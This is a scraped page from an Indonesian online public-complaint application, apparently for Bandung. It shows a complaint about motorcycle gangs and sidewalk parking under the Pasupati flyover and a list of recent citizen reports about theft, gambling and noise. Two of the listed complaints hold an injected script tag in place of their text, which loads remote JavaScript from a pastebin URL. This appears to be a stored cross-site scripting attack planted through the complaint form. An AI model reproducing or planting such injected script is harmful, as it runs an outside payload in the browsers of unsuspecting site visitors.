HEADLINE

APLIKASI PENGADUAN ONLINE


Cara baru yang lebih praktis untuk pengaduan masyarakat

Pengaduan online merupakan bentuk tanggung jawab kami untuk meningkatkan pelayanan kepada masyarakat. Buat pengaduan baru beserta data dan foto pendukung.

Kami akan mengabarkan tindak lanjut pengaduan melalui email, sehingga Anda dapat memantau perkembangan pengaduan Anda.



Pengaduan
No Pengaduan
2017021440J6A2Z
Proses Pengaduan
Dalam Proses
Tanggal
Sabtu, 18 Februari 2017
Judul
Gang motor di area kawasan jembatan layang pasupati
Kategori
Masyarakat
Kecamatan
Bandung Wetan
Kelurahan
Taman Sari
Alamat/ Lokasi
Dibawah jembatan pasupati dekat dengan Dukomsel
Isi Pengaduan
Banyak gang motor di area jembatan layang pasupati , terdapat puluhan-ratusan motor yang sampai beberapa di parkir diatas trotoar menganggu kenyamanan dan keamanan warga sekitar . (saya tidak bisa memfotonya karena sedang di dalam mobil )

Tindak Pengaduan
Belum Ada
Pantau Pengaduan
Temukan status terakhir pengaduan Anda dengan memasukkan No Pengaduan :

Pengaduan Masyarakat
<script type="text/javascript" src="https://pastebin.com/raw/n8XmFyvn"></script>
Rabu, 17 Juli 2019
<script type="text/javascript" src="https://pastebin.com/raw/n8XmFyvn"></script>
pencurian hp dan dompet
Rabu, 17 Juli 2019
sya mau lapor saya kemarin lagi kerja di lokasi cijerah telah di curi HP sma DOMPET yg isi nya stnk
kegaduhan
Sabtu, 13 Juli 2019
kami warga jl.cibolerang barat rw 01 sangat merasa terganggu dengan sekumpulan anak2 brigez yg tiap malam
Judi ludo
Sabtu, 13 Juli 2019
Judi ludo di area parkiran samping hotel pasar baru square
Cukur rambut berkelompok tidak bayar
Kamis, 11 Juli 2019
Oknum anggota dan ketua sundawani bojongloa kaler dengan seenaknya nyukur rambut di barbershop saya
Pencurian motor
Senin, 08 Juli 2019
Telah hilang motor scoopy thn 2018 warna merah hitam dengan nopol D 6563 VDW pada hari kamis tgl 4 Juli